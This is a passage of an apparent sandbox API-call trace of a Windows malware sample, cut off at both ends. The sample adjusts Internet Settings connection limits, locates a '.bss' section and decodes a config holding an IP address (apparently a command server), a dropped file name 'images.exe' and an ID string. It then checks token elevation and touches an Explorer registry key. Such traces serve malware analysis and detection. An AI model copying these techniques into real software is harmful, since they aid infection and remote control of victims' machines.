0x290 [0289.024] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x36600 [0289.024] ReadFile (in: hFile=0x290, lpBuffer=0x320a020, nNumberOfBytesToRead=0x36600, lpNumberOfBytesRead=0x21cf8c4, lpOverlapped=0x0 | out: lpBuffer=0x320a020*, lpNumberOfBytesRead=0x21cf8c4*=0x36600, lpOverlapped=0x0) returned 1 [0289.030] CloseHandle (hObject=0x290) returned 1 [0289.031] GetProcessHeap () returned 0x8a0000 [0289.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ba9c0 [0289.031] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="ñ\x0e\x965") returned 0x290 [0289.031] GetLastError () returned 0x0 [0289.031] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x21cf8e0, lpdwDisposition=0x21cf8f4 | out: phkResult=0x21cf8e0*=0x294, lpdwDisposition=0x21cf8f4*=0x2) returned 0x0 [0289.031] RegSetValueExA (in: hKey=0x294, lpValueName="MaxConnectionsPer1_0Server", Reserved=0x0, dwType=0x4, lpData=0x21cf8ec*=0xa, cbData=0x4 | out: lpData=0x21cf8ec*=0xa) returned 0x0 [0289.032] RegSetValueExA (in: hKey=0x294, lpValueName="MaxConnectionsPerServer", Reserved=0x0, dwType=0x4, lpData=0x21cf8ec*=0xa, cbData=0x4 | out: lpData=0x21cf8ec*=0xa) returned 0x0 [0289.032] RegCloseKey (hKey=0x294) returned 0x0 [0289.032] Sleep (dwMilliseconds=0x1f4) [0289.533] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x294 [0289.533] GetProcessHeap () returned 0x8a0000 [0289.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xf4) returned 0x8d4aa0 [0289.533] GetProcessHeap () returned 0x8a0000 [0289.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x400) returned 0x8d4ba0 [0289.533] GetProcessHeap () returned 0x8a0000 [0289.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x13000) returned 0x8d4fa8 [0289.535] GetProcessHeap () returned 0x8a0000 [0289.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x13000) returned 0x8e7fb0 [0289.537] GetProcessHeap () returned 0x8a0000 [0289.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4fa8 | out: hHeap=0x8a0000) returned 1 [0289.539] GetProcessHeap () returned 0x8a0000 [0289.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x4a00) returned 0x8c0008 [0289.539] GetProcessHeap () returned 0x8a0000 [0289.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x4a00) returned 0x8c4a10 [0289.540] GetProcessHeap () returned 0x8a0000 [0289.541] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0008 | out: hHeap=0x8a0000) returned 1 [0289.541] GetProcessHeap () returned 0x8a0000 [0289.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x600) returned 0x8c9418 [0289.541] GetProcessHeap () returned 0x8a0000 [0289.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x600) returned 0x8c9a20 [0289.541] GetProcessHeap () returned 0x8a0000 [0289.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9418 | out: hHeap=0x8a0000) returned 1 [0289.542] GetProcessHeap () returned 0x8a0000 [0289.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e00) returned 0x8cc538 [0289.542] GetProcessHeap () returned 0x8a0000 [0289.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e00) returned 0x8c0008 [0289.542] GetProcessHeap () returned 0x8a0000 [0289.542] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cc538 | out: hHeap=0x8a0000) returned 1 [0289.542] GetProcessHeap () returned 0x8a0000 [0289.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1000) returned 0x8c2e10 [0289.542] GetProcessHeap () returned 0x8a0000 [0289.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1000) returned 0x8fafb8 [0289.543] GetProcessHeap () returned 0x8a0000 [0289.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c2e10 | out: hHeap=0x8a0000) returned 1 [0289.543] GetProcessHeap () returned 0x8a0000 [0289.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8ca028 [0289.543] GetProcessHeap () returned 0x8a0000 [0289.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5a4) returned 0x8c9418 [0289.543] GetProcessHeap () returned 0x8a0000 [0289.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x13000) returned 0x8d4fa8 [0289.545] GetProcessHeap () returned 0x8a0000 [0289.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x4a00) returned 0x8fbfc0 [0289.546] GetProcessHeap () returned 0x8a0000 [0289.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x600) returned 0x9009c8 [0289.546] GetProcessHeap () returned 0x8a0000 [0289.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e00) returned 0x8cc538 [0289.546] GetProcessHeap () returned 0x8a0000 [0289.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1000) returned 0x8cf340 [0289.546] GetProcessHeap () returned 0x8a0000 [0289.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fafb8 | out: hHeap=0x8a0000) returned 1 [0289.546] GetProcessHeap () returned 0x8a0000 [0289.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0008 | out: hHeap=0x8a0000) returned 1 [0289.547] GetProcessHeap () returned 0x8a0000 [0289.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9a20 | out: hHeap=0x8a0000) returned 1 [0289.547] GetProcessHeap () returned 0x8a0000 [0289.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a10 | out: hHeap=0x8a0000) returned 1 [0289.548] GetProcessHeap () returned 0x8a0000 [0289.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7fb0 | out: hHeap=0x8a0000) returned 1 [0289.550] GetProcessHeap () returned 0x8a0000 [0289.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c99c8 [0289.550] GetProcessHeap () returned 0x8a0000 [0289.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca028 | out: hHeap=0x8a0000) returned 1 [0289.550] lstrlenA (lpString=".bss") returned 4 [0289.550] lstrlenA (lpString=".bss") returned 4 [0289.550] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0289.551] lstrcpyA (in: lpString1=0x3610000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0289.551] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.552] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.552] GetProcessHeap () returned 0x8a0000 [0289.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x13000) returned 0x8e7fb0 [0289.555] lstrlenA (lpString=".text") returned 5 [0289.555] lstrlenA (lpString=".text") returned 5 [0289.555] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.556] lstrcpyA (in: lpString1=0x3620000, lpString2=".text" | out: lpString1=".text") returned=".text" [0289.556] lstrcmpA (lpString1=".text", lpString2=".bss") returned 1 [0289.556] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.557] GetProcessHeap () returned 0x8a0000 [0289.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e7fb0 | out: hHeap=0x8a0000) returned 1 [0289.559] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.559] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.559] GetProcessHeap () returned 0x8a0000 [0289.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x4a00) returned 0x8c0008 [0289.560] lstrlenA (lpString=".rdata") returned 6 [0289.560] lstrlenA (lpString=".rdata") returned 6 [0289.560] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.561] lstrcpyA (in: lpString1=0x3620000, lpString2=".rdata" | out: lpString1=".rdata") returned=".rdata" [0289.561] lstrcmpA (lpString1=".rdata", lpString2=".bss") returned 1 [0289.561] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.561] GetProcessHeap () returned 0x8a0000 [0289.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0008 | out: hHeap=0x8a0000) returned 1 [0289.562] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.562] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.562] GetProcessHeap () returned 0x8a0000 [0289.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x600) returned 0x8c9bd0 [0289.562] lstrlenA (lpString=".data") returned 5 [0289.562] lstrlenA (lpString=".data") returned 5 [0289.562] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.563] lstrcpyA (in: lpString1=0x3620000, lpString2=".data" | out: lpString1=".data") returned=".data" [0289.563] lstrcmpA (lpString1=".data", lpString2=".bss") returned 1 [0289.563] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.564] GetProcessHeap () returned 0x8a0000 [0289.564] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9bd0 | out: hHeap=0x8a0000) returned 1 [0289.564] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.564] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.564] GetProcessHeap () returned 0x8a0000 [0289.564] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x2e00) returned 0x8c0008 [0289.565] lstrlenA (lpString=".rsrc") returned 5 [0289.565] lstrlenA (lpString=".rsrc") returned 5 [0289.565] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.565] lstrcpyA (in: lpString1=0x3620000, lpString2=".rsrc" | out: lpString1=".rsrc") returned=".rsrc" [0289.565] lstrcmpA (lpString1=".rsrc", lpString2=".bss") returned 1 [0289.565] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.566] GetProcessHeap () returned 0x8a0000 [0289.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c0008 | out: hHeap=0x8a0000) returned 1 [0289.566] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.567] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.567] GetProcessHeap () returned 0x8a0000 [0289.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1000) returned 0x900fd0 [0289.567] lstrlenA (lpString=".reloc") returned 6 [0289.567] lstrlenA (lpString=".reloc") returned 6 [0289.567] VirtualAlloc (lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.567] lstrcpyA (in: lpString1=0x3620000, lpString2=".reloc" | out: lpString1=".reloc") returned=".reloc" [0289.567] lstrcmpA (lpString1=".reloc", lpString2=".bss") returned 1 [0289.567] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.568] GetProcessHeap () returned 0x8a0000 [0289.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900fd0 | out: hHeap=0x8a0000) returned 1 [0289.568] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.568] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.568] GetProcessHeap () returned 0x8a0000 [0289.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c9bd0 [0289.568] lstrlenA (lpString=".bss") returned 4 [0289.568] lstrlenA (lpString=".bss") returned 4 [0289.568] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.571] lstrcpyA (in: lpString1=0x3620000, lpString2=".bss" | out: lpString1=".bss") returned=".bss" [0289.571] lstrcmpA (lpString1=".bss", lpString2=".bss") returned 0 [0289.571] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.572] GetProcessHeap () returned 0x8a0000 [0289.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9bd0 | out: hHeap=0x8a0000) returned 1 [0289.572] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x756d0000 [0289.572] GetProcAddress (hModule=0x756d0000, lpProcName="MessageBoxA") returned 0x7574fec0 [0289.572] GetProcessHeap () returned 0x8a0000 [0289.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c9bd0 [0289.572] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.573] GetProcessHeap () returned 0x8a0000 [0289.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c9dd8 [0289.573] GetProcessHeap () returned 0x8a0000 [0289.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8c9fe0 [0289.573] GetProcessHeap () returned 0x8a0000 [0289.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9dd8 | out: hHeap=0x8a0000) returned 1 [0289.573] GetProcessHeap () returned 0x8a0000 [0289.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1ca) returned 0x8c9dd8 [0289.573] GetProcessHeap () returned 0x8a0000 [0289.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1ca) returned 0x8ca1e8 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9dd8 | out: hHeap=0x8a0000) returned 1 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1ca) returned 0x8c9dd8 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8ae780 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8aeb80 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ae780 | out: hHeap=0x8a0000) returned 1 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8ae800 [0289.574] GetProcessHeap () returned 0x8a0000 [0289.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8aeb80 | out: hHeap=0x8a0000) returned 1 [0289.575] GetProcessHeap () returned 0x8a0000 [0289.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8aec80 [0289.575] GetProcessHeap () returned 0x8a0000 [0289.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1ca) returned 0x900fd0 [0289.575] GetProcessHeap () returned 0x8a0000 [0289.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x1ca) returned 0x9011a8 [0289.575] GetProcessHeap () returned 0x8a0000 [0289.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900fd0 | out: hHeap=0x8a0000) returned 1 [0289.576] GetProcessHeap () returned 0x8a0000 [0289.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8aec80 | out: hHeap=0x8a0000) returned 1 [0289.576] GetProcessHeap () returned 0x8a0000 [0289.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9dd8 | out: hHeap=0x8a0000) returned 1 [0289.576] GetProcessHeap () returned 0x8a0000 [0289.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca1e8 | out: hHeap=0x8a0000) returned 1 [0289.577] GetProcessHeap () returned 0x8a0000 [0289.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e) returned 0x8ba6c8 [0289.577] lstrlenW (lpString="23.227.202.157") returned 14 [0289.577] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0289.577] lstrlenW (lpString="23.227.202.157") returned 14 [0289.577] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0289.577] lstrlenW (lpString="23.227.202.157") returned 14 [0289.577] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.578] lstrcpyW (in: lpString1=0x3620000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0289.578] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.578] GetProcessHeap () returned 0x8a0000 [0289.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ba6c8 | out: hHeap=0x8a0000) returned 1 [0289.578] lstrlenW (lpString="23.227.202.157") returned 14 [0289.578] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3610000 [0289.579] lstrcpyW (in: lpString1=0x3610000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0289.579] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.579] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.580] GetProcessHeap () returned 0x8a0000 [0289.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0x8bce18 [0289.580] lstrlenW (lpString="images.exe") returned 10 [0289.580] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.580] lstrlenW (lpString="images.exe") returned 10 [0289.580] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.580] lstrlenW (lpString="images.exe") returned 10 [0289.580] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0289.581] lstrcpyW (in: lpString1=0x3630000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.581] VirtualFree (lpAddress=0x3620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.581] GetProcessHeap () returned 0x8a0000 [0289.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8bce18 | out: hHeap=0x8a0000) returned 1 [0289.581] lstrlenW (lpString="images.exe") returned 10 [0289.581] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3620000 [0289.582] lstrcpyW (in: lpString1=0x3620000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.582] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.582] GetProcessHeap () returned 0x8a0000 [0289.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x8bff60 [0289.582] lstrlenW (lpString="Images") returned 6 [0289.582] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0289.583] lstrlenW (lpString="Images") returned 6 [0289.583] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0289.583] lstrlenW (lpString="Images") returned 6 [0289.583] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0289.583] lstrcpyW (in: lpString1=0x3640000, lpString2="Images" | out: lpString1="Images") returned="Images" [0289.583] VirtualFree (lpAddress=0x3630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.584] GetProcessHeap () returned 0x8a0000 [0289.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8bff60 | out: hHeap=0x8a0000) returned 1 [0289.584] lstrlenW (lpString="Images") returned 6 [0289.584] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3630000 [0289.584] lstrcpyW (in: lpString1=0x3630000, lpString2="Images" | out: lpString1="Images") returned="Images" [0289.584] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.585] GetProcessHeap () returned 0x8a0000 [0289.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0x8bcf58 [0289.585] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.585] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0289.585] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.585] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.585] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.585] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0289.586] lstrcpyW (in: lpString1=0x3650000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.586] VirtualFree (lpAddress=0x3640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.586] GetProcessHeap () returned 0x8a0000 [0289.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8bcf58 | out: hHeap=0x8a0000) returned 1 [0289.586] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.586] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3640000 [0289.589] lstrcpyW (in: lpString1=0x3640000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.590] VirtualFree (lpAddress=0x3650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.590] GetProcessHeap () returned 0x8a0000 [0289.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9011a8 | out: hHeap=0x8a0000) returned 1 [0289.591] GetProcessHeap () returned 0x8a0000 [0289.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c9bd0 | out: hHeap=0x8a0000) returned 1 [0289.591] GetProcessHeap () returned 0x8a0000 [0289.591] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c99c8 | out: hHeap=0x8a0000) returned 1 [0289.591] GetProcessHeap () returned 0x8a0000 [0289.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cf340 | out: hHeap=0x8a0000) returned 1 [0289.592] GetProcessHeap () returned 0x8a0000 [0289.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cc538 | out: hHeap=0x8a0000) returned 1 [0289.592] GetProcessHeap () returned 0x8a0000 [0289.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9009c8 | out: hHeap=0x8a0000) returned 1 [0289.592] GetProcessHeap () returned 0x8a0000 [0289.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fbfc0 | out: hHeap=0x8a0000) returned 1 [0289.595] GetProcessHeap () returned 0x8a0000 [0289.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4fa8 | out: hHeap=0x8a0000) returned 1 [0289.596] GetProcessHeap () returned 0x8a0000 [0289.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d4ba0 | out: hHeap=0x8a0000) returned 1 [0289.598] ReleaseMutex (hMutex=0x294) returned 0 [0289.598] CloseHandle (hObject=0x294) returned 1 [0289.598] VirtualFree (lpAddress=0x0, dwSize=0x0, dwFreeType=0x8000) returned 0 [0289.598] GetProcessHeap () returned 0x8a0000 [0289.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x32) returned 0x8aeb80 [0289.598] lstrlenW (lpString="23.227.202.157") returned 14 [0289.598] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3650000 [0289.599] lstrcpyW (in: lpString1=0x3650000, lpString2="23.227.202.157" | out: lpString1="23.227.202.157") returned="23.227.202.157" [0289.599] lstrlenW (lpString="images.exe") returned 10 [0289.599] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3660000 [0289.599] lstrcpyW (in: lpString1=0x3660000, lpString2="images.exe" | out: lpString1="images.exe") returned="images.exe" [0289.599] lstrlenW (lpString="Images") returned 6 [0289.599] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3670000 [0289.600] lstrcpyW (in: lpString1=0x3670000, lpString2="Images" | out: lpString1="Images") returned="Images" [0289.600] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.600] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3680000 [0289.601] lstrcpyW (in: lpString1=0x3680000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.601] GetProcessHeap () returned 0x8a0000 [0289.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x8, Size=0x200) returned 0x8ca1e8 [0289.601] GetCurrentProcess () returned 0xffffffff [0289.601] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x21cf894 | out: TokenHandle=0x21cf894*=0x294) returned 1 [0289.601] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x14, TokenInformation=0x21cf88c, TokenInformationLength=0x4, ReturnLength=0x21cf890 | out: TokenInformation=0x21cf88c, ReturnLength=0x21cf890) returned 1 [0289.601] CloseHandle (hObject=0x294) returned 1 [0289.602] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0289.602] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.602] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0289.602] lstrcpyW (in: lpString1=0x3690000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0289.602] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0289.602] VirtualAlloc (lpAddress=0x0, dwSize=0x68, flAllocationType=0x3000, flProtect=0x4) returned 0x36a0000 [0289.603] lstrcpyW (in: lpString1=0x36a0000, lpString2="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" | out: lpString1="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\" [0289.603] VirtualFree (lpAddress=0x3690000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0289.603] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.603] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x3690000 [0289.604] lstrcpyW (in: lpString1=0x3690000, lpString2="L15UQINRPS" | out: lpString1="L15UQINRPS") returned="L15UQINRPS" [0289.604] lstrlenW (lpString="L15UQINRPS") returned 10 [0289.604] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\") returned 51 [0289.604] VirtualQuery (in: lpAddress=0x36a0000, lpBuffer=0x21cf84c, dwLength=0x1c | out: lpBuffer=0x21cf84c*(BaseAddress=0x36a0000, AllocationBase=0x36a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, 